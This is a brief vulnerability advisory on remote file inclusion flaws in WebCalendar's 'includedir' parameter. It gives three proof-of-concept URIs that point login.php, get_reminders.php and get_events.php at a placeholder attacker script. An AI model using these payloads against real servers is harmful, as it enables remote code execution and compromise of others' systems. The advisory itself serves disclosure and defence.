WebCalendar IncludeDir Multiple Remote File Include Vulnerabilities

WebCalendar IncludeDir Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/[calendar]/ws/login.php?includedir=[evilscript]
http://www.example.com/[calendar]/ws/get_reminders.php?includedir=[evilscript]
http://www.example.com/[calendar]/ws/get_events.php?includedir=[evilscript]